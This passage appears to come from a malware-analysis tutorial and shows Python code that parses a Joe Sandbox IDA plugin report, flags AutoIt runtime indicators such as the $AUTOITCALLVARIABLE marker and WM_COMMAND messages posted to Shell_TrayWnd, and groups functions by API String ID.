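# Constructed sample: three of the function entries listed above, reduced to the
# lines this parser reads (report indentation and the hash fields it ignores removed).
SAMPLE = """\
APIs
• __snwprintf.LIBCMT ref: 00FF3B7C
• Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
Strings
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
• Instruction Fuzzy Hash: 12218031600219ABCF14FFA4CC92EED77A9BF84700F544499F605AB241DB34EA45EBA1
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010059D7
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 010059EA
• Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000), ref: 00FE5363
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Instruction Fuzzy Hash: F5D01231384312B7E679BB719C0FFD77A18BB44F51F00092AB395AA1C4C9FAA900D754
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01005A17
• PostMessageW.USER32(00000000), ref: 01005A1E
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Instruction Fuzzy Hash: 5DD0C9313843127BE679AB719C0FF967618AB44B51F00092AB395AA1C4C9EAA9009754
"""

# One "Name.MODULE(args), ref: ADDR" line; the argument list is absent for CRT calls.
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
WM_COMMAND = "00000111"  # second PostMessageW argument as the report prints it

# subcall is True when the report lists the call under "Part of subcall function"
ApiCall = namedtuple("ApiCall", "name module args ref subcall")

@dataclass
class FuncEntry:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # the "Similarity" key/value lines

def parse_entries(text):
    """Split the plugin listing into one FuncEntry per 'APIs' header."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append(cur := FuncEntry())
            section = line
            continue
        if line in SECTIONS:
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            subcall = body.startswith("Part of subcall function")
            if subcall:  # drop the "Part of subcall function XXXXXXXX: " prefix
                body = body.split(": ", 1)[1]
            m = API_RE.match(body)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), subcall))
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            cur.meta[key] = value
    return entries

def autoit_indicators(entries):
    """Return (entry index, reason) pairs for entries that look like AutoIt runtime code."""
    hits = []
    for i, e in enumerate(entries):
        if "AUTOITCALLVARIABLE" in e.meta.get("String ID", ""):
            hits.append((i, "AutoIt interpreter marker string $AUTOITCALLVARIABLE%d"))
        direct = [a for a in e.apis if not a.subcall]  # ignore calls made by subroutines
        finds_tray = any(a.name == "FindWindowW" and "Shell_TrayWnd" in a.args for a in direct)
        posts_cmd = any(a.name == "PostMessageW" and WM_COMMAND in a.args for a in direct)
        if finds_tray and posts_cmd:
            hits.append((i, "posts WM_COMMAND (0x111) to the taskbar window Shell_TrayWnd"))
    return hits

def group_by_api_string_id(entries):
    """Map each 'API String ID' to the Instruction Fuzzy Hashes of the functions sharing it."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.meta.get("API String ID")].append(e.meta.get("Instruction Fuzzy Hash"))
    return dict(groups)
```

Grouping on `API String ID` rather than on the instruction hash is deliberate: the two `Shell_TrayWnd` entries above have different `Instruction Fuzzy Hash` values but the same API and string signature, which is exactly the similarity the report's `Similarity` block is meant to expose. The second `PostMessageW` entry carries only one argument in the listing, so the WM_COMMAND check deliberately does not fire for it; the parser reports what the listing shows rather than assuming the missing arguments.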